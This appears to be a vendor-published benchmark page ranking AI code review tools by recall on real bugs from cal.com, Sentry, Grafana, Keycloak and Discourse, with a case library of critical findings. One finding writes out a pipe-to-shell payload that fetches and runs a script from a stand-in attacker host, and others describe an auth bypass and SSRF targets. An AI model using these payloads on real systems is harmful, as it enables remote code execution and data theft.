AI Code Review Benchmarks · 2026

How well do AI code reviewers catch real bugs?

In this independent 2026 benchmark of 7 leading AI code review tools, Tenki catches 84 of 122 real production bugs across 50 pull requests from cal.com, Sentry, Grafana, Keycloak, and Discourse, graded per finding by a 3-judge LLM panel. That is 1.9× as many as the next-best reviewers, Devin and Greptile, which catch 44 each.

Real bugs caught: 84 / 122 (Tenki, #1 reviewer · finding-level scoring)
7 tools · 122 bugs · 5 repos · 350 reviews

Methodology

How we benchmarked AI code reviewers

Every pull request in the benchmark is derived from a real, merged bug fix in an open-source codebase. We replay the bug-introducing diff into a clean fork and let each tool review it with its default configuration. Reviews are then graded by a panel of three LLM judges using majority vote. No synthetic bugs, no repo-specific tuning.

01 · SOURCES

50 bug-fix PRs from 5 open-source repositories

Real merged fixes from cal.com (TypeScript), sentry (Python), grafana (Go), keycloak (Java), and discourse (Ruby), so the bug set covers five widely used server-side languages.

02 · REPLAY

Real bugs reintroduced, not invented

The pre-fix diff is replayed against every tool with default settings: no custom rules, no repo-specific tuning, and full repository context for every reviewer. Every tool sees the same code at the same point in history.

03 · JUDGING

Per-finding 3-judge LLM majority vote

Each individual bug is scored separately. A finding is counted as caught only when a line-level comment explicitly identifies the faulty code and explains the impact, and the majority of three independent LLM judges agrees. Per-PR scoring is avoided because it over-credits drive-by comments.
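
The per-finding majority vote described above can be sketched in a few lines of Python. This is a minimal illustration, not the benchmark's actual harness: the function names and the example finding IDs are hypothetical, and each judge's verdict is assumed to arrive as a plain boolean.

```python
from typing import Dict, List


def is_caught(votes: List[bool]) -> bool:
    """Return True when a strict majority of judges voted 'caught'."""
    return sum(votes) * 2 > len(votes)


def finding_level_recall(verdicts: Dict[str, List[bool]]) -> float:
    """Share of findings that a majority of judges marked as caught."""
    if not verdicts:
        return 0.0
    caught = sum(1 for votes in verdicts.values() if is_caught(votes))
    return caught / len(verdicts)


# Hypothetical verdicts: one entry per finding, one vote per judge.
example = {
    "finding-001": [True, True, False],   # 2 of 3 judges agree: caught
    "finding-002": [True, False, False],  # 1 of 3 judges agree: missed
    "finding-003": [True, True, True],    # unanimous: caught
}
print(f"{finding_level_recall(example):.1%}")
```

Scoring each finding on its own means a tool that comments on a PR without naming the faulty code earns no credit for the bugs that PR contains.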

Overall performance

Leaderboard: recall, precision, and F1 across every real bug

Each individual bug is scored, not each pull request. Recall is the share of real bugs caught. Precision is the share of a tool's comments that flag a real bug. F1 is the harmonic mean of recall and precision and drives the ranking.
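
As a worked check of the F1 definition, the sketch below recomputes F1 from the recall and precision figures reported in the leaderboard. The function name is illustrative; the inputs are the published percentages expressed as fractions.

```python
def f1_score(recall: float, precision: float) -> float:
    """Harmonic mean of recall and precision (both given as fractions)."""
    if recall + precision == 0:
        return 0.0
    return 2 * recall * precision / (recall + precision)


# (recall, precision) pairs taken from the leaderboard figures.
reported = {
    "Tenki": (0.689, 0.299),
    "CodeRabbit": (0.287, 0.250),
    "Graphite": (0.033, 0.500),
}

for tool, (r, p) in reported.items():
    print(f"{tool}: F1 = {100 * f1_score(r, p):.1f}")
```

Because the harmonic mean is pulled toward the smaller of the two inputs, Graphite's 50.0% precision cannot offset its 3.3% recall.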

Tenki, #1 reviewer: 68.9% recall (caught 84 of 122 real bugs) · precision 29.9% · F1 41.7

| Reviewer | Recall | Precision | F1 |
| --- | --- | --- | --- |
| Tenki (#1) | 68.9% (84/122) | 29.9% | 41.7 |
| CodeRabbit | 28.7% (35/122) | 25.0% | 26.7 |
| Greptile | 36.1% (44/122) | 15.9% | 22.1 |
| Copilot | 24.6% (30/122) | 18.9% | 21.4 |
| Graphite | 3.3% (4/122) | 50.0% | 6.2 |

Sorted by F1 · 3 LLM judges · default tool configurations

Higher-precision tools post fewer comments overall. Tenki's higher comment volume drives both higher recall and lower precision; see methodology for how each metric is computed.

Coding agents · for reference

Coding agents are bundled into the IDE and review their own work in-loop, not post-hoc on a PR diff. Shown here for context, not as an apples-to-apples comparison.

| Reviewer | Recall | Precision | F1 |
| --- | --- | --- | --- |
| Devin (coding agent) | 36.1% (44/122) | 47.3% | 40.9 |
| Cursor (coding agent) | 32.0% (39/122) | 51.3% | 39.4 |

Head-to-head

Tenki vs Devin: the closest AI code reviewer

Devin is the runner-up by F1 score in this benchmark. Tenki's lead is widest at the finding level, where recall (the share of real bugs caught) matters most for engineering teams who need coverage they can trust.

| Metric | Tenki | Devin | Δ |
| --- | --- | --- | --- |
| Bugs caught | 84 | 44 | +40 |
| Recall | 68.9% | 36.1% | +32.8pp |
| Precision | 29.9% | 47.3% | -17.4pp |
| F1 score | 41.7 | 40.9 | +0.8 |
| Critical bugs caught | 57.1% | 28.6% | +28.6pp |
| PRs where only Tenki found a bug | 1 | n/a | +1 |

By Severity

Do AI code reviewers catch the bugs that actually matter?

Catch rate broken down by the severity of the individual finding. Critical bugs cause outages, data loss, or auth bypass. High-severity bugs break major user-facing flows. Medium bugs degrade behavior without breaking it. Critical is the severity that matters most for production reliability.

| Reviewer | Critical (7 bugs) | High (53 bugs) | Medium (52 bugs) | Low (10 bugs) |
| --- | --- | --- | --- | --- |
| Tenki | 57% (4/7) | 74% (39/53) | 69% (36/52) | 50% (5/10) |
| CodeRabbit | 43% (3/7) | 25% (13/53) | 33% (17/52) | 20% (2/10) |
| Copilot | 43% (3/7) | 25% (13/53) | 23% (12/52) | 20% (2/10) |
| Cursor | 14% (1/7) | 34% (18/53) | 35% (18/52) | 20% (2/10) |
| Devin | 29% (2/7) | 45% (24/53) | 29% (15/52) | 30% (3/10) |
| Graphite | 0% (0/7) | 2% (1/53) | 4% (2/52) | 10% (1/10) |
| Greptile | 71% (5/7) | 32% (17/53) | 37% (19/52) | 30% (3/10) |

By Repository

Performance per codebase: cal.com, Sentry, Grafana, Keycloak, Discourse

Per-repository recall: the share of real bugs each AI code reviewer caught in each codebase. The Tenki Δ column is the gap, in percentage points, between Tenki and the best other reviewer for that repo; it is negative where another reviewer leads.

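| Repository | Tenki | CodeRabbit | Copilot | Cursor | Devin | Graphite | Greptile | Tenki Δ |
| --- | --- | --- | --- | --- | --- | --- | --- | --- |
| cal.com (33 bugs) | 91% (30/33) | 21% (7/33) | 21% (7/33) | 30% (10/33) | 33% (11/33) | 0% (0/33) | 30% (10/33) | +57.6pp |
| sentry (31 bugs) | 55% (17/31) | 16% (5/31) | 6% (2/31) | 13% (4/31) | 29% (9/31) | 0% (0/31) | 13% (4/31) | +25.8pp |
| discourse (22 bugs) | 73% (16/22) | 36% (8/22) | 32% (7/22) | 32% (7/22) | 27% (6/22) | 5% (1/22) | 50% (11/22) | +22.7pp |
| keycloak (15 bugs) | 67% (10/15) | 40% (6/15) | 47% (7/15) | 47% (7/15) | 27% (4/15) | 0% (0/15) | 53% (8/15) | +13.3pp |
| grafana (21 bugs) | 52% (11/21) | 43% (9/21) | 33% (7/21) | 52% (11/21) | 67% (14/21) | 14% (3/21) | 52% (11/21) | -14.3pp |
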
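
The Tenki Δ values can be reproduced from the per-repository counts. The sketch below does so for two of the five repositories, using the caught-bug counts reported for cal.com and grafana; the function name and data layout are illustrative only.

```python
from typing import Dict


def tenki_delta_pp(caught: Dict[str, int], total_bugs: int, subject: str = "Tenki") -> float:
    """Gap in percentage points between `subject` and the best other reviewer."""
    best_other = max(n for tool, n in caught.items() if tool != subject)
    return round((caught[subject] - best_other) / total_bugs * 100, 1)


# Bugs caught per reviewer, copied from the per-repository results.
cal_com = {"Tenki": 30, "CodeRabbit": 7, "Copilot": 7, "Cursor": 10,
           "Devin": 11, "Graphite": 0, "Greptile": 10}
grafana = {"Tenki": 11, "CodeRabbit": 9, "Copilot": 7, "Cursor": 11,
           "Devin": 14, "Graphite": 3, "Greptile": 11}

print(tenki_delta_pp(cal_com, 33))   # Tenki leads Devin on cal.com
print(tenki_delta_pp(grafana, 21))   # Devin leads Tenki on grafana
```

The delta is computed from raw counts rather than the rounded percentages, which is why it can differ by 0.1pp from a subtraction of the displayed values.
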
Case Library

Every real bug, every reviewer verdict

One row per real bug. 122 distinct findings across 50 production pull requests. Each cell shows whether that AI code reviewer flagged that specific finding. Yes/No is decided by a 3-LLM majority vote. The seven Critical bugs are listed below.

# · Repo · PR · Finding · Severity · Tenki · CodeRabbit · Copilot · Cursor · Devin · Graphite · Greptile
001 · cal.com · #3
Backup-code login bypasses password verification
packages/features/auth/lib/next-auth-options.ts, authorize():

    if (user.password && !credentials.totpCode) {
      // verify password via verifyPassword(credentials.password, user.password)
    }
    if (user.twoFactorEnabled && credentials.backupCode) {
      // accept backup code as 2FA factor
    } else if (user.twoFactorEnabled) {
      // verify totpCode
    }

Submitting `credentials.totpCode = <anything truthy>` (it does not need to be valid because the new branch only consumes backupCode) makes `!credentials.totpCode` false and skips the password block entirely. The backup-code branch then accepts the credential and the user is logged in.

Effect: an attacker who has any single backup code can sign in without the account password, so backup codes become permanent password replacements rather than recovery factors.

Fix: verify the password unconditionally when user.password is set (regardless of totpCode/backupCode presence) and only use backupCode in place of totpCode, not in place of password.
Critical
002 · cal.com · #8
Missing `prisma` import in SalesforceCalendarService causes runtime crash +ext
**🚨 Missing `prisma` import in SalesforceCalendarService causes runtime crash** (bug) In `packages/app-store/salesforce/lib/CalendarService.ts`, `prisma.credential.update` is called on line 96 to persist refreshed tokens, but `prisma` is never imported. There is no `import prisma from "@calcom/prisma"` in the file. This will throw a `ReferenceError: prisma is not defined` at runtime whenever Salesforce credentials need a token refresh. **💡 Suggestion**: Add `import prisma from "@calcom/prisma";` to the import block at the top of the file. <details> <summary>📋 Prompt for AI Agents</summary> In packages/app-store/salesforce/lib/CalendarService.ts, add a missing import for prisma. After the existing import block (around line 20), add: `import prisma from "@calcom/prisma";`. This is required because `prisma.credential.update` is called on line 96 to persist refreshed tokens, but the module is never imported, causing a ReferenceError at runtime. </details>
Critical
003 · discourse · #4
best.html.erb closes if/else with `<%- end if %>` — invalid Ruby, view crashes
app/views/embed/best.html.erb (added in this PR) opens an if/else at lines 2-6: <%- if @topic_view.posts.present? %> ... <%- else %> ... <%- end if %> The `end if` form is Ruby's trailing-if statement modifier and requires an expression after `if` (e.g. `end if some_cond`). With no expression the template compiles to invalid Ruby and rendering raises SyntaxError. The embed view is the entry point for the new embeddable-comments feature, so any host page that embeds Discourse comments will fail to render the iframe. Fix: change to `<%- end %>`.
Critical
004 · discourse · #4
SSRF via user-controlled embed_url triggers open() to arbitrary URL +ext
**🚨 SSRF via user-controlled embed_url triggers open() to arbitrary URL** (security) In `EmbedController#best` (line 9), the `embed_url` parameter comes directly from user-supplied query parameters. When no existing topic embed is found, this value is passed verbatim to `Jobs.enqueue(:retrieve_topic, embed_url: embed_url)`. Inside `Jobs::RetrieveTopic#execute`, it is passed to `TopicRetriever.new(@embed_url)`, which calls `TopicEmbed.import_remote(user, @embed_url)`, which calls `open(url).read` (Ruby's `Kernel#open` / `open-uri`). Although `TopicRetriever#invalid_host?` checks that the URL's host matches `SiteSetting.embeddable_host`, this check only runs for pre-validated embeds after the job is enqueued — the URL is already accepted by the controller before any host validation occurs (the controller only checks the HTTP Referer header, not the embed_url itself). More critically, `Kernel#open` also accepts pipe-prefixed strings (`|command`) on older Ruby/open-uri combinations that allow OS command execution. Even if host validation were reliable, a URL with a valid host prefix but path traversal (e.g. query string exploits) can reach internal services. **💡 Suggestion**: Validate `embed_url` against the configured `embeddable_host` in the controller before enqueuing the job, not just in the retriever. Use `URI.parse` and compare the host explicitly, and reject any URL whose scheme is not `http` or `https`. Additionally, replace `open(url)` in `import_remote` with `Net::HTTP` or a whitelisted HTTP client that cannot be used for file/pipe access. <details> <summary>📋 Prompt for AI Agents</summary> In app/controllers/embed_controller.rb, before calling Jobs.enqueue at line 15, add host validation of embed_url: parse it with URI.parse, verify the scheme is http/https and the host matches SiteSetting.embeddable_host, and raise Discourse::InvalidAccess if either check fails. 
In app/models/topic_embed.rb at line 48, replace `open(url).read` with an explicit HTTP fetch using Net::HTTP or Faraday so that file:// and pipe-exec URIs are never processed. </details>
Critical
005 · discourse · #4
SSRF and RCE via Kernel#open with attacker-controlled URL from Disqus XML +ext
**🚨 SSRF and RCE via Kernel#open with attacker-controlled URL from Disqus XML** (security) The PR replaces `PostCreator` with `TopicEmbed.import_remote(user, t[:link], ...)` at line 148. The value `t[:link]` is read directly from the `<link>` element of the Disqus XML export file (parsed at `disqus.thor:58`). Inside `TopicEmbed.import_remote` (topic_embed.rb:48), Ruby's `Kernel#open(url)` is called with this attacker-controlled value **before** any URL validation. Ruby's `Kernel#open` has two critical behaviours beyond HTTP: 1. **Remote Code Execution**: if the URL begins with `|`, it is interpreted as a shell command. A Disqus XML containing `<link>|curl attacker.com/shell.sh | bash</link>` would execute arbitrary shell commands on the import host. 2. **SSRF / local file read**: URLs with `file://` scheme or internal addresses (e.g., `http://169.254.169.254/`) allow reading arbitrary local files or probing internal services. The `https?://` guard in `TopicEmbed.import` (line 11) does NOT protect against this because `open(url)` in `import_remote` is called at line 48 **before** `import` is invoked at line 52. The `TopicRetriever` code path validates the host against `SiteSetting.embeddable_host`, but the Disqus importer bypasses that validation entirely. **💡 Suggestion**: Replace `Kernel#open(url)` with an explicit HTTP client call (e.g., `Net::HTTP.get(URI(url))` or `open-uri` with explicit `URI.open`) and validate the URL scheme before fetching. Add a guard at the start of `import_remote` that rejects non-http(s) URLs (matching the guard already present in `import`). Additionally, validate `t[:link]` in `disqus.thor` before passing it to `import_remote`. 
```suggestion doc = Readability::Document.new(URI.open(url).read, ``` <details> <summary>📋 Prompt for AI Agents</summary> In app/models/topic_embed.rb, the `import_remote` method at line 44 uses Ruby's `Kernel#open(url)` at line 48 to fetch a URL that can originate from an attacker-controlled Disqus XML file (via lib/tasks/disqus.thor line 148). Ruby's Kernel#open executes shell commands when the string starts with '|', enabling RCE. Fix this by: (1) adding a URL scheme check at the top of `import_remote` identical to the one in `import` (line 11): `return unless url =~ /^https?:\/\//`; (2) replacing `open(url)` with `URI.open(url)` (from OpenURI) or an explicit Net::HTTP call to avoid the shell-dispatch behaviour of Kernel#open. Also add `require 'open-uri'` if not already present. </details>
Critical
006 · keycloak · #6
GroupPermissionsV2.canManage() accepts VIEW scope — privilege escalation
services/src/main/java/org/keycloak/services/resources/admin/permissions/GroupPermissionsV2.java, around line 70:

    public boolean canManage() {
        if (root.hasOneAdminRole(AdminRoles.MANAGE_USERS)) return true;
        return hasPermission(null, AdminPermissionsSchema.VIEW, AdminPermissionsSchema.MANAGE);
    }

The corresponding per-group `canManage(GroupModel group)` later in the same file (~line 78) correctly does `hasPermission(group.getId(), MANAGE)`. The no-arg variant must mirror that: a manage operation must require a manage scope. Accepting VIEW here means that a user granted ONLY the all-groups VIEW permission satisfies the canManage() check and can then call admin endpoints that gate on requireManage()/canManage() (GroupsResource.addTopLevelGroup, GroupResource cross-group moves, etc.).

Fix: `hasPermission(null, AdminPermissionsSchema.MANAGE)`.
Critical
007 · sentry · #4
OAuth state parameter is a deterministic pipeline.signature, not a per-session nonce
src/sentry/integrations/github/integration.py introduces OAuthLoginView with `state = pipeline.signature` and validates the callback via `request.GET.get('state') != pipeline.signature`. Per src/sentry/pipeline/base.py:133, pipeline.signature is computed as `md5_text(*[f'{module}.{cls}' for v in self.pipeline_views]).hexdigest()` — a deterministic hash of the pipeline view class names. The value is identical for every Sentry installation that uses the same GitHub provider pipeline, so an attacker who knows the (open-source) pipeline composition can predict the state value, craft a callback URL with a stolen authorization code, and bind an attacker-controlled GitHub installation to the victim's session. The fix is to generate a per-session cryptographic nonce (e.g. secrets.token_urlsafe), store it in pipeline state, and compare against that. Recommended additions: PKCE, exact-match redirect URI validation, and rate-limit the callback.
Critical
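
The fix proposed for finding 007 (a per-session nonce from `secrets.token_urlsafe`, stored server-side and compared on callback) can be sketched as follows. This is an illustration under stated assumptions, not Sentry's pipeline API: the `session` dict, the `oauth_state` key, and both function names are hypothetical stand-ins for whatever per-session storage the pipeline provides.

```python
import hmac
import secrets
from typing import Optional


def new_oauth_state(session: dict) -> str:
    """Generate an unpredictable per-session state value and remember it."""
    state = secrets.token_urlsafe(32)
    session["oauth_state"] = state  # hypothetical storage key
    return state


def verify_oauth_state(session: dict, returned_state: Optional[str]) -> bool:
    """Check the callback's state against the stored nonce, then discard it."""
    expected = session.pop("oauth_state", None)  # single use
    if not expected or not returned_state:
        return False
    # Constant-time comparison avoids leaking how many characters matched.
    return hmac.compare_digest(expected.encode(), returned_state.encode())


session = {}
state = new_oauth_state(session)
print(verify_oauth_state(session, state))    # matching state is accepted once
print(verify_oauth_state(session, state))    # replaying the same state fails
```

Unlike a hash of the pipeline's view class names, this value differs for every login attempt, so an attacker who knows the open-source pipeline composition cannot predict it.
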